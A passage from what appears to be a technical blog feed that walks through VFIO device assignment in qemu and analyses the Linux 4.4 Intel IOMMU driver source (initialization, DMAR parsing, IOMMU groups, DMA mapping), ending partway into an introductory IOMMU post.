<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 03:00.0 Ethernet controller: VMware VMXNET3 Ethernet Controller (rev 01)
</code></pre></div></div>
<h3> 3 </h3>
<p>Find the devices’ iommu group, this is generated when iommu initializing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ls -lh /sys/bus/pci/devices/0000:03:00.0/iommu_group/devices
total 0
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.0 -> ../../../../devices/pci0000:00/0000:00:15.0
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.1 -> ../../../../devices/pci0000:00/0000:00:15.1
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.2 -> ../../../../devices/pci0000:00/0000:00:15.2
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.3 -> ../../../../devices/pci0000:00/0000:00:15.3
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.4 -> ../../../../devices/pci0000:00/0000:00:15.4
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.5 -> ../../../../devices/pci0000:00/0000:00:15.5
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.6 -> ../../../../devices/pci0000:00/0000:00:15.6
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.7 -> ../../../../devices/pci0000:00/0000:00:15.7
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:03:00.0 -> ../../../../devices/pci0000:00/0000:00:15.0/0000:03:00.0
</code></pre></div></div>
<p>In general, the devices of the same iommu group should assign the same domain. However, in this example, only our vmxnet network card is a PCI device, others are all PCI bridges, vfio-pci does not currently support PCI bridges.</p>
<h3> 4 </h3>
<p>Unbind the device with the driver</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 0000:01:10.0 >/sys/bus/pci/devices/0000:03:00.0/driver/unbind
</code></pre></div></div>
<h3> 5 </h3>
<p>Find the vendor and device ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ lspci -n -s 0000:03:00.0
03:00.0 0200: 15ad:07b0 (rev 01)
</code></pre></div></div>
<h3> 6 </h3>
<p>Bind the device to vfio-pci driver(should modprobe vfio-pci firstly)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 15ad 07b0 > /sys/bus/pci/drivers/vfio-pci/new_id
</code></pre></div></div>
<p>Now we can see a new node created in ‘/dev/vfio/’, this is the group id.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ls -l /dev/vfio/
total 0
crw------- 1 root root 243, 0 Aug 14 08:23 6
crw-rw-rw- 1 root root 10, 196 Aug 14 08:23 vfio
</code></pre></div></div>
<h3> 7 </h3>
<p>start qemu with the assigned device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_64-softmmu/qemu-system-x86_64 -m 1024 -smp 4 -hda /home/test/test.img --enable-kvm -vnc :0 --enable-kvm -device vfio-pci,host=03:00.0,id=net0
</code></pre></div></div>
<p>Now we can see the device in guest and it’s driver is vmxnet3.</p>
<p><img src="/assets/img/vfio1/1.png" alt="" /></p>
intel IOMMU driver analysis2019-08-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/10/iommu-driver-analysis
<p>In the last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/04/iommu-introduction">IOMMU introduction</a> we have got the basic idea of what is IOMMU and what it is for. In this post, we will dig into the intel-iommu driver source. The kernel version as before is 4.4.</p>
<p>In order to experiment the IOMMU we start a VM with vIOMMU, following is the command line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gdb --args x86_64-softmmu/qemu-system-x86_64 -machine q35,accel=kvm,kernel-irqchip=split -m 1G -device intel-iommu -hda ~/test.img
</code></pre></div></div>
<p>In order to enable the intel-iommu we need to add ‘intel_iommu=on” argument to the kernel command line.</p>
<p>This post will contains following five part:</p>
<ul>
<li>intel-iommu initialization</li>
<li>DMAR table parsing</li>
<li>DMAR initialization</li>
<li>Add device to iommu group</li>
<li>DMA operation without and with IOMMU</li>
</ul>
<h3> intel-iommu initialization </h3>
<p>The bios is responsible for detecting the remapping hardware functions and it reports the remapping hardware units through the DMA Remapping Reporting(DMAR) ACPI table. DMAR ACPI table’s format is defined in VT-d spec 8.1. Just in a summary,
DMAR ACPI table contains one DMAR remapping reporting structure and several remapping structures. qemu creates this DMAR ACPI table data in function ‘build_dmar_q35’.</p>
<p>‘DMAR remapping reporting structure’ contains a standard ACPI table header with some specific data for ‘DMAR’. There are several kinds of ‘Remapping Structure Types’. The type ‘0’ is DMA Remapping Hardware Unit(DRHD) structure, this is the most important structure. A DRHD structure represents a remapping hardware unit present in the platform. Following figure shows the format of DRHD.</p>
<p><img src="/assets/img/iommu_driver/1.png" alt="" /></p>
<p>Here the ‘Segment Number ‘ is the PCI Segment associated with this unit, PCI Segment is for the sever which needs a lot of PCI bus, it has one more PCI root bridge, every tree of this PCI root bridge is a PCI Domain/Segment. The ‘Flags’ currently only only has one valid bit. If ‘INCLUDE_PCI_ALL’ is set, it means the intel-iommu represented by this DRHD will control the PCI compatible devices, except devices reported under the scope of other DHRD. The ‘Device Scope[]’ contains zero or more Device Scope Entries, each Device Scope Entry can be used to indicate a PCI endport device that will be controlled in this DRHD. If the iommu support interrupt remapping capability, each IOxAPIC in the platform reported by MADT ACPI table must be explicity enumerated under the Device Scope of the appropriate remapping hardware uinits. In ‘build_dmar_q35’ function, qemu only creates one DRHD with a ‘IOAPIC’ device scope entry. If the ‘device-iotlb’ is suppported, there also a ‘Root Port ATS Capability Reporting (ATSR) Structure’.</p>
<p>For “intel_iommu=” parameter, kernel handles it using ‘intel_iommu_setup’ function. For “intel_iommu=on”, the ‘dmar_disabled’ will be set to 0. In kernel function ‘detect_intel_iommu’, it will detect the intel-iommu device. It calls ‘dmar_table_detect’ to map the DMAR ACPI table to kernel and use ‘dmar_tbl’ point it, then it walks the table with ‘dmar_res_callback’. There only a ‘dmar_validate_one_drhd’ for DRHD table. ‘dmar_validate_one_drhd’ will return 0 if the DRHD is valid. So finally the ‘iommu_detected’ will be set to 1 and ‘x86_init.iommu.iommu_init’ will be set to ‘intel_iommu_init’.</p>
<p>Later in ‘pci_iommu_init’, the ‘iommu_init’ callback will be called. ‘intel_iommu_init’ will be used to initialized the intel-iommu device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init intel_iommu_init(void)
{
int ret = -ENODEV;
struct dmar_drhd_unit *drhd;
struct intel_iommu *iommu;
/* VT-d is required for a TXT/tboot launch, so enforce that */
force_on = tboot_force_iommu();
if (iommu_init_mempool()) {
if (force_on)
panic("tboot: Failed to initialize iommu memory\n");
return -ENOMEM;
}
down_write(&dmar_global_lock);
if (dmar_table_init()) {
if (force_on)
panic("tboot: Failed to initialize DMAR table\n");
goto out_free_dmar;
}
if (dmar_dev_scope_init() < 0) {
if (force_on)
panic("tboot: Failed to initialize DMAR device scope\n");
goto out_free_dmar;
}
...
if (dmar_init_reserved_ranges()) {
if (force_on)
panic("tboot: Failed to reserve iommu ranges\n");
goto out_free_reserved_range;
}
init_no_remapping_devices();
ret = init_dmars();
...
up_write(&dmar_global_lock);
pr_info("Intel(R) Virtualization Technology for Directed I/O\n");
init_timer(&unmap_timer);
#ifdef CONFIG_SWIOTLB
swiotlb = 0;
#endif
dma_ops = &intel_dma_ops;
init_iommu_pm_ops();
for_each_active_iommu(iommu, drhd)
iommu->iommu_dev = iommu_device_create(NULL, iommu,
intel_iommu_groups,
"%s", iommu->name);
bus_set_iommu(&pci_bus_type, &intel_iommu_ops);
bus_register_notifier(&pci_bus_type, &device_nb);
if (si_domain && !hw_pass_through)
register_memory_notifier(&intel_iommu_memory_nb);
intel_iommu_enabled = 1;
return 0;
...
}
</code></pre></div></div>
<p>‘iommu_init_mempool’ is used to create some caches. ‘dmar_table_init’ is used to parse the dmar table. ‘dmar_dev_scope_init’ does some initialization for the ‘Device Scope’ in DRHD. ‘dmar_init_reserved_ranges’ reserves all PCI MMIO adress to avoid peer-to-peer access. As the name indicating, ‘init_no_remapping_devices’ initializes the no mapping devices. ‘init_dmars’ is an important function, later I will use one section to analysis this. For every iommu device, iommu_device_create creates a sysfs device. ‘bus_set_iommu’ is used to add current PCI device to the appropriated iommu group and also register notifier to get the device add notification.</p>
<h3> DMAR table parsing </h3>
<p>‘intel_iommu_init’ calls ‘dmar_table_init’ which calls ‘parse_dmar_table’ to do the DMAR table parsing.
‘parse_dmar_table’ prepares a ‘dmar_res_callback’ struct which contains handlers of the every kind of the ‘Remapping structure’. Then ‘dmar_table_detect’ is called again to map the DMAR ACPI table to ‘dmar_tbl’. Later ‘dmar_walk_dmar_table’ is called with the ‘dma_rs_callback’ to walk the dmar_tbl and calls the correspoding remapping structure. For our qemu case, only a DHRD is used, the handler is ‘dmar_parse_one_drhd’.</p>
<p>The ‘dma_parse_one_drhd’ parses the DMAR table and creates a ‘dmar_drhd_unit’ struct, this struct is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dmar_drhd_unit {
struct list_head list; /* list of drhd units */
struct acpi_dmar_header *hdr; /* ACPI header */
u64 reg_base_addr; /* register base address*/
struct dmar_dev_scope *devices;/* target device array */
int devices_cnt; /* target device count */
u16 segment; /* PCI domain */
u8 ignored:1; /* ignore drhd */
u8 include_all:1;
struct intel_iommu *iommu;
};
</code></pre></div></div>
<p>Most of the field is explained by the comment, the ‘iommu’ is allocated and initialized by ‘alloc_iommu’ function.
‘alloc_iommu’ will map the MMIO of iommu device and do some initialization work according to the BAR. In the last of ‘dma_parse_one_hrhd’ it calls ‘dmar_register_drhd_unit’ to add our new ‘dmar_drhd_unit’ to ‘dmar_drhd_units’ list. Following figure show the relation between ‘dmar_drhd_unit’ and ‘intel_iommu’.</p>
<p><img src="/assets/img/iommu_driver/2.png" alt="" /></p>
<p>‘dmar_dev_scope_init’ is used to initialize the Decie Scope Entries in DRHD, but as our one DRHR sets the ‘INCLUDE_PCI_ALL’ flag, it actually dones nothing.</p>
<p>‘dmar_init_reserved_ranges’ is used to reverse the ‘IOAPIC’ and all PCI MMIO address, so that the PCI device’s DMA will not use these IOVA.</p>
<p>‘init_no_remapping_devices’ also does nothing as our DRHD sets the ‘INCLUDE_PCI_ALL’ flag.</p>
<h3> DMAR initialization </h3>
<p>So we come to the ‘init_dmars’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __init init_dmars(void)
{
struct dmar_drhd_unit *drhd;
struct dmar_rmrr_unit *rmrr;
bool copied_tables = false;
struct device *dev;
struct intel_iommu *iommu;
int i, ret;
/*
* for each drhd
* allocate root
* initialize and program root entry to not present
* endfor
*/
for_each_drhd_unit(drhd) {
/*
* lock not needed as this is only incremented in the single
* threaded kernel __init code path all other access are read
* only
*/
if (g_num_of_iommus < DMAR_UNITS_SUPPORTED) {
g_num_of_iommus++;
continue;
}
pr_err_once("Exceeded %d IOMMUs\n", DMAR_UNITS_SUPPORTED);
}
/* Preallocate enough resources for IOMMU hot-addition */
if (g_num_of_iommus < DMAR_UNITS_SUPPORTED)
g_num_of_iommus = DMAR_UNITS_SUPPORTED;
g_iommus = kcalloc(g_num_of_iommus, sizeof(struct intel_iommu *),
GFP_KERNEL);
if (!g_iommus) {
pr_err("Allocating global iommu array failed\n");
ret = -ENOMEM;
goto error;
}
deferred_flush = kzalloc(g_num_of_iommus *
sizeof(struct deferred_flush_tables), GFP_KERNEL);
if (!deferred_flush) {
ret = -ENOMEM;
goto free_g_iommus;
}
for_each_active_iommu(iommu, drhd) {
g_iommus[iommu->seq_id] = iommu;
intel_iommu_init_qi(iommu);
ret = iommu_init_domains(iommu);
if (ret)
goto free_iommu;
init_translation_status(iommu);
if (translation_pre_enabled(iommu) && !is_kdump_kernel()) {
iommu_disable_translation(iommu);
clear_translation_pre_enabled(iommu);
pr_warn("Translation was enabled for %s but we are not in kdump mode\n",
iommu->name);
}
/*
* TBD:
* we could share the same root & context tables
* among all IOMMU's. Need to Split it later.
*/
ret = iommu_alloc_root_entry(iommu);
if (ret)
goto free_iommu;
...
}
/*
* Now that qi is enabled on all iommus, set the root entry and flush
* caches. This is required on some Intel X58 chipsets, otherwise the
* flush_context function will loop forever and the boot hangs.
*/
for_each_active_iommu(iommu, drhd) {
iommu_flush_write_buffer(iommu);
iommu_set_root_entry(iommu);
iommu->flush.flush_context(iommu, 0, 0, 0, DMA_CCMD_GLOBAL_INVL);
iommu->flush.flush_iotlb(iommu, 0, 0, 0, DMA_TLB_GLOBAL_FLUSH);
}
...
/*
* If we copied translations from a previous kernel in the kdump
* case, we can not assign the devices to domains now, as that
* would eliminate the old mappings. So skip this part and defer
* the assignment to device driver initialization time.
*/
if (copied_tables)
goto domains_done;
...
domains_done:
/*
* for each drhd
* enable fault log
* global invalidate context cache
* global invalidate iotlb
* enable translation
*/
for_each_iommu(iommu, drhd) {
if (drhd->ignored) {
/*
* we always have to disable PMRs or DMA may fail on
* this device
*/
if (force_on)
iommu_disable_protect_mem_regions(iommu);
continue;
}
iommu_flush_write_buffer(iommu);
#ifdef CONFIG_INTEL_IOMMU_SVM
if (pasid_enabled(iommu) && ecap_prs(iommu->ecap)) {
ret = intel_svm_enable_prq(iommu);
if (ret)
goto free_iommu;
}
#endif
ret = dmar_set_interrupt(iommu);
if (ret)
goto free_iommu;
if (!translation_pre_enabled(iommu))
iommu_enable_translation(iommu);
iommu_disable_protect_mem_regions(iommu);
}
return 0;
...
}
</code></pre></div></div>
<p>First iterate the ‘dmar_drhd_units’ and get the number of iommu device, store it in ‘g_num_of_iommus’. Allocate the space of all iommu pointer, store it in ‘g_iommus’. Then the ‘for_each_active_iommu’ loop initializes the iommu device.</p>
<p>In the loop, ‘intel_iommu_init_qi’ is used to initialize the queued invalidation interface, this interface is described in VT-d spec 6.5.2. ‘intel_iommu_init_qi’ allocates the queued invalidation interface’s ring buffer, store it in ‘iommu->qi’ and write the ‘iommu->qi’ physical address to iommu device’s register ‘DMAR_IQA_REG’.</p>
<p>Return to the loop, after the queued invalidation initialization finished, ‘iommu_init_domains’ is called to initialize the domain-related data structure. Referenced from VT-d spec: A domain is abstractly defined as an isolated environment in the platform, to which a subset of the host physical memory is allocated. I/O devices that are allowed to access physical memory directly are allocated to a domain and are referred to as the domain’s assigned devices. For virtualization
usages, software may treat each virtual machine as a domain. ‘iommu_init_domains’ allocates a bitmap used for the domain id, stores it in ‘iomu->domain_ids’. A domain is represented by ‘dmar_domain’ struct. An iommu can support a lot of domain, but it may uses just a very small domain. So we can’t allocated all the ‘dmar_domain<em>’. Instead, we uses a level allocation. ‘iommu->domains’ points an array of ‘dmar_domain**) and ‘iommu->domains[i]’ points the second level. And first we only allocates 256 ‘dmar_domin</em>’ pointer.</p>
<p>In the loop, we allocates the root table by calling ‘iommu_alloc_root_entry’.</p>
<p>The ‘init_dmars’ then does the second ‘for_each_active_iommu’, this time it just sets root table entry’s base address by calling ‘for_each_active_iommu’.</p>
<p>‘init_dmars’ calls ‘iommu_prepare_isa’ to do a identity_map for the ISA bridge. Then we go to the finally loop.
In the final for_each_iommu loop. It first invalidate the context cache and iotlb by calling ‘iommu_flush_write_buffer’, then request a irq to log the dma remapping fault, finally calls ‘iommu_enable_translation’ to enable the translation.</p>
<p>After the ‘init_dmars’, the data structure shows bellow.</p>
<p><img src="/assets/img/iommu_driver/3.png" alt="" /></p>
<h3> Add device to iommu group </h3>
<p>IOMMU group is the smallest sets of devices that can be considered isolated from the perspective of IOMMU. Some devices can do peer-to-peer DMA without the involvement of IOMMU, for these device, if they has different IOVA page table and do the peer-to-per DMA, it will cause errors. Alex Williamson has written a great post explaining the IOMMU group <a href="http://vfio.blogspot.com/2014/08/iommu-groups-inside-and-out.html">IOMMU Groups, inside and out</a>. In ‘intel_iommu_init’, it calls ‘bus_set_iommu’ to set current PCI device to device iommu group.</p>
<p>‘bus_set_iommu’ is used to set iommu-callback for the bus. Following sets the pci bus’s iommu callback to intel_iommu_ops.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bus_set_iommu(&pci_bus_type, &intel_iommu_ops);
</code></pre></div></div>
<p>‘bus_set_iommu’ sets ‘bus->iommu_ops’ to the ‘ops’ parameter, then calls ‘iommu_bus_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int iommu_bus_init(struct bus_type *bus, const struct iommu_ops *ops)
{
int err;
struct notifier_block *nb;
struct iommu_callback_data cb = {
.ops = ops,
};
nb = kzalloc(sizeof(struct notifier_block), GFP_KERNEL);
if (!nb)
return -ENOMEM;
nb->notifier_call = iommu_bus_notifier;
err = bus_register_notifier(bus, nb);
if (err)
goto out_free;
err = bus_for_each_dev(bus, NULL, &cb, add_iommu_group);
if (err)
goto out_err;
return 0;
out_err:
/* Clean up */
bus_for_each_dev(bus, NULL, &cb, remove_iommu_group);
bus_unregister_notifier(bus, nb);
out_free:
kfree(nb);
return err;
}
</code></pre></div></div>
<p>‘iommu_bus_init’ registers a notifier for the bus event, this is useful for new hot-plug devices. The most work is to call ‘add_iommu_group’ for every PCI device. ‘add_iommu_group’ just calls the ‘iommu_ops’s add_device callback, it’s ‘intel_iommu_add_device’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int intel_iommu_add_device(struct device *dev)
{
struct intel_iommu *iommu;
struct iommu_group *group;
u8 bus, devfn;
iommu = device_to_iommu(dev, &bus, &devfn);
if (!iommu)
return -ENODEV;
iommu_device_link(iommu->iommu_dev, dev);
group = iommu_group_get_for_dev(dev);
if (IS_ERR(group))
return PTR_ERR(group);
iommu_group_put(group);
return 0;
}
</code></pre></div></div>
<p>First, get the ‘intel_iommu’ associated with the device ‘dev’ and also get the ‘bus’ and ‘devfn’ of the device.
It’s quite easy, just get the device’s domain(segment) id and use this segment id to find the ‘intel_iommu’ in ‘dmar_drhd_units’ list.</p>
<p>‘iommu_device_link’ function is also trivial. Create a link file ‘iommu’ in PCI device directory to point the iommu device directory and also a ‘link’ in iommu ‘devices’ directory to point the PCI device.</p>
<p>The most important is ‘iommu_group_get_for_dev’, thsi function finds or creates the IOMMU group for a device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct iommu_group *iommu_group_get_for_dev(struct device *dev)
{
const struct iommu_ops *ops = dev->bus->iommu_ops;
struct iommu_group *group;
int ret;
group = iommu_group_get(dev);
...
if (ops && ops->device_group)
group = ops->device_group(dev);
...
ret = iommu_group_add_device(group, dev);
...
return group;
}
</code></pre></div></div>
<p>Device’s iommu group is stored in ‘device’ struct’s iommu_group. The ‘iommu_group_get’ returns this, if it’s not NULL, just return this group. In the first time, it is NULL, so it calls ‘iommu_ops’s device_group callback, it’s ‘pci_device_group’ for intel iommu.</p>
<p>‘pci_device_group’ will find or create a IOMMU group for a device. There are several cases to get a device IOMMU group from an existing device.
For example, if one bridge support ACS, we need to go to the upstream bus. Also a multi-function device’s all function device need to share the same IOMMU group. If ‘pci_device_group’ can’t find a IOMMU group, it calls ‘iommu_group_alloc’ to create a new one. ‘iommu_group_alloc’ will create a number directory in ‘/sys/kernel/iommu_groups’ directory. For example, ‘/sys/kernel/iommu_groups/3’.</p>
<p>After get the device’s IOMMU group, ‘iommu_group_get_for_dev’ calls ‘iommu_group_add_device’ to add the device to the IOMMU group. First create a ‘iommu_group’ link pointing the ‘/sys/kernel/iommu_groups/$group_id’ in the PCI device’s directory. Then it creates a link in ‘/sys/kernel/iommu_groups/$group_id/devices/0000:$pci_bdf” to point the PCI device.
Set the device’s iommu_group to ‘group’ and add the deivce to the ‘group->devices’ list.</p>
<p>A lot of function, let’s wrap it up.</p>
<p>intel_iommu_init
->bus_set_iommu
->iommu_bus_init
-> add_iommu_group(For each PCI device calls ‘add_iommu_group’)
->iommu_ops->add_device(intel_iommu_add_device)
->device_to_iommu
->iommu_device_link
->iommu_group_get_for_dev
->iommu_ops->device_group(pci_device_group)
->iommu_group_alloc
->iommu_group_add_device</p>
<h3> DMA operation without and with IOMMU </h3>
<p>Now the IOMMU has been initialized, what’s the difference between with and without IOMMU when devices do DMA. This part I will do some analysis, but not cover all of the detail of DMA.</p>
<p>Device uses ‘dma_alloc_coherent’ function to allocates physical memory to do DMA operation. It returns the virtual address and the DMA physical address is returned in the third argument. ‘dma_alloc_coherent’ will call ‘dma_ops->alloc’. ‘dma_ops’ is set to ‘intel_dma_ops’ in ‘intel_iomu_init’, for intel iommu this callback is ‘intel_alloc_coherent’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void *intel_alloc_coherent(struct device *dev, size_t size,
dma_addr_t *dma_handle, gfp_t flags,
struct dma_attrs *attrs)
{
struct page *page = NULL;
int order;
size = PAGE_ALIGN(size);
order = get_order(size);
if (!iommu_no_mapping(dev))
flags &= ~(GFP_DMA | GFP_DMA32);
else if (dev->coherent_dma_mask < dma_get_required_mask(dev)) {
if (dev->coherent_dma_mask < DMA_BIT_MASK(32))
flags |= GFP_DMA;
else
flags |= GFP_DMA32;
}
if (gfpflags_allow_blocking(flags)) {
unsigned int count = size >> PAGE_SHIFT;
page = dma_alloc_from_contiguous(dev, count, order);
if (page && iommu_no_mapping(dev) &&
page_to_phys(page) + size > dev->coherent_dma_mask) {
dma_release_from_contiguous(dev, page, count);
page = NULL;
}
}
if (!page)
page = alloc_pages(flags, order);
if (!page)
return NULL;
memset(page_address(page), 0, size);
*dma_handle = __intel_map_single(dev, page_to_phys(page), size,
DMA_BIDIRECTIONAL,
dev->coherent_dma_mask);
if (*dma_handle)
return page_address(page);
if (!dma_release_from_contiguous(dev, page, size >> PAGE_SHIFT))
__free_pages(page, order);
return NULL;
}
</code></pre></div></div>
<p>First allocates the memory needed(by calling ‘dma_alloc_from_contiguous’ or just ‘alloc_pages’) then canlls ‘__intel_map_single’ to do the memmory map.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static dma_addr_t __intel_map_single(struct device *dev, phys_addr_t paddr,
size_t size, int dir, u64 dma_mask)
{
struct dmar_domain *domain;
phys_addr_t start_paddr;
struct iova *iova;
int prot = 0;
int ret;
struct intel_iommu *iommu;
unsigned long paddr_pfn = paddr >> PAGE_SHIFT;
...
domain = get_valid_domain_for_dev(dev);
if (!domain)
return 0;
iommu = domain_get_iommu(domain);
size = aligned_nrpages(paddr, size);
iova = intel_alloc_iova(dev, domain, dma_to_mm_pfn(size), dma_mask);
if (!iova)
goto error;
...
ret = domain_pfn_mapping(domain, mm_to_dma_pfn(iova->pfn_lo),
mm_to_dma_pfn(paddr_pfn), size, prot);
...
start_paddr = (phys_addr_t)iova->pfn_lo << PAGE_SHIFT;
start_paddr += paddr & ~PAGE_MASK;
return start_paddr;
...
}
</code></pre></div></div>
<p>The skeleton of ‘__intel_map_single’ is showed above. First get/create a domain by calling ‘get_valid_domain_for_dev’, then allocates the IOVA by calling ‘intel_alloc_iova’, finally do the IOVA->physical address mapping by calling ‘domain_pfn_mapping’. The IOVA is returned.</p>
<p>As the domain’s definition indicates, if the system will allocate physical memory to a device, a domain need to be bind to this physical memory. A domain is defined using ‘get_domain_for_dev’ structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dmar_domain {
int nid; /* node id */
unsigned iommu_refcnt[DMAR_UNITS_SUPPORTED];
/* Refcount of devices per iommu */
u16 iommu_did[DMAR_UNITS_SUPPORTED];
/* Domain ids per IOMMU. Use u16 since
* domain ids are 16 bit wide according
* to VT-d spec, section 9.3 */
struct list_head devices; /* all devices' list */
struct iova_domain iovad; /* iova's that belong to this domain */
struct dma_pte *pgd; /* virtual address */
int gaw; /* max guest address width */
/* adjusted guest address width, 0 is level 2 30-bit */
int agaw;
int flags; /* flags to find out type of domain */
int iommu_coherency;/* indicate coherency of iommu access */
int iommu_snooping; /* indicate snooping control feature*/
int iommu_count; /* reference count of iommu */
int iommu_superpage;/* Level of superpages supported:
0 == 4KiB (no superpages), 1 == 2MiB,
2 == 1GiB, 3 == 512GiB, 4 == 1TiB */
u64 max_addr; /* maximum mapped address */
struct iommu_domain domain; /* generic domain data structure for
iommu core */
};
</code></pre></div></div>
<p>‘iovad’ contains a rb-tree to hold all of the IOVA for the domain. ‘pgd’ is the page table directory which is for the iova->physical address. ‘domain’ contains the generic domain data structure.
domain is allocated in ‘get_domain_for_dev’.</p>
<p>In ‘get_domain_for_dev’, domain is allocated by calling ‘alloc_domain’ and initialized by calling ‘domain_init’.
In ‘domain_init’, ‘init_iova_domain’ is used to init the ‘iovad’ memory to set the start pfn of IOVA to 1 and end pfn of IOVA to 4G. ‘domain_reserve_special_ranges’ is uesd to reverse the special physical memory in ‘reserved_iova_list’ this means the IOVA can’t be one the address in this list. ‘alloc_pgtable_page’ allocates a page table as the page table directory, store it in ‘domain->gpd’.</p>
<p>In ‘get_domain_for_dev’, ‘dmar_insert_one_dev_info’ is called to allocated a ‘device_domain_info’ and stored it in ‘device’s archdata.iommu field. In the end of ‘dmar_insert_one_dev_info’, there is an important step to call ‘domain_context_mapping’. ‘domain_context_mapping’ calls ‘domain_context_mapping_one’ to setup the IOMMU DAM remapping page table. In ‘domain_context_mapping_one’, ‘iommu_context_addr’ is called to get the context entry in context table, then ‘context_set_address_root’ is called to set the context entry’s to the domain’s pgd physical address.</p>
<p>After geting/creating the domain, ‘__intel_map_single’ calls ‘intel_alloc_iova’ to allocates the requested size of IOVA range in this domain. Then calling ‘domain_pfn_mapping’ to setup the mapping. ‘__domain_mapping’ is doing the actual work.</p>
<p>In ‘__domain_mapping’, ‘pfn_to_dma_pte’ will allocate the not-present pte and set it to according the IOVA address. After ‘__domain_mapping’, we has a page table which translate the IOVA to physical address.</p>
<p>Following figure shows the data structure relation.</p>
<p><img src="/assets/img/iommu_driver/4.png" alt="" /></p>
<p>With the iommu, we can the the dma address is 0xffffxxxx, and the host physical address is 0x384f2000.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) b vtd_iommu_translate
Breakpoint 2 at 0x5555572724f2: file /home/test/qemu5/qemu/hw/i386/intel_iommu.c, line 2882.
(gdb) c
Continuing.
Thread 1 "qemu-system-x86" hit Breakpoint 2, vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
2882 {
(gdb) finish
Run till exit from #0 vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
address_space_translate_iommu (iommu_mr=0x61a000019ef0, xlat=0x7fffffffc420, plen_out=0x7fffffffc3e0, page_mask_out=0x0, is_write=true, is_mmio=true, target_as=0x7fffffffc290, attrs=...) at /home/test/qemu5/qemu/exec.c:493
493 if (!(iotlb.perm & (1 << is_write))) {
Value returned is $5 = {target_as = 0x55555ad79380 <address_space_memory>, iova = 4294950912, translated_addr = 944709632, addr_mask = 4095, perm = IOMMU_RW}
(gdb) p /x $5
$6 = {target_as = 0x55555ad79380, iova = 0xffffc000, translated_addr = 0x384f2000, addr_mask = 0xfff, perm = 0x3}
</code></pre></div></div>
<p>Without the iommu, we can see the dma address is just the host physical address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 4 "qemu-system-x86" hit Breakpoint 1, pci_dma_write (dev=0x7fffa3eba800, addr=946098204, buf=0x7fffe4ba6bbc, len=4) at /home/test/qemu5/qemu/include/hw/pci/pci.h:795
795 return pci_dma_rw(dev, addr, (void *) buf, len, DMA_DIRECTION_FROM_DEVICE);
(gdb) p /x addr
$1 = 0x3864501c
(gdb)
</code></pre></div></div>
IOMMU introduction2019-08-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/04/iommu-introduction
<p>MMU is used by CPU to translate a virtual address to physical address. The virtual address of MMU is in CPU’s view. The IOMMU in contrast is used by device to translate another virtual address called IOVA(IO virtual address) to physical address. Following show
the basic idea of IOMMU.</p>
<p><img src="/assets/img/iommu/1.png" alt="" /></p>
<p>IOMMU is very useful for device assignment in virtual machine platform. Device assignment directly assign the physical IO device to VMs. In device assignment the driver for an assigned IO device runs in the VM to which it is assigned and is allowed to interact directly with the device hardware with minimal or no VMM involvement. Device assignment has very high performance compared with the software-based device emulation and virtio-based device emulation.</p>
<p>Device assignment introduces an issue just like how the virtual machine accesses the VM’s physical memory.
In virtual machine environment, the OS in VM uses the virtual address to access data, this guest virtual address(GVA) is translated to guest physical address(GPA). However we still need to access the host physical address as it stores data. This is done by EPT in VT-x hardware. For device assignment, the driver in guest OS specify the guest physical address for DMA, however the physical IO device need the host physical adress to access. The device need something like EPT to translate the DMA address(GPA) specify by device driver in guest OS to host physical address. This is the mainly purpose of IOMMU.
IOMMU has the ability to isolate and restrict device accesses to the resources(the physical memory allcated to the VM for example) owned by the virtual machine. Following figure depicts how system software interacts with hardware support for both VT-x and VT-d.</p>
<p><img src="/assets/img/iommu/2.png" alt="" /></p>
<p>Intel IOMMU(also called VT-d) has the following capabilities:</p>
<ul>
<li>DMA remapping: this supports address translations for DMA from device.</li>
<li>Interrupt remapping: this supports isolation and routing of interrupts from devices and external interrupt controllers to appropriate VMs.</li>
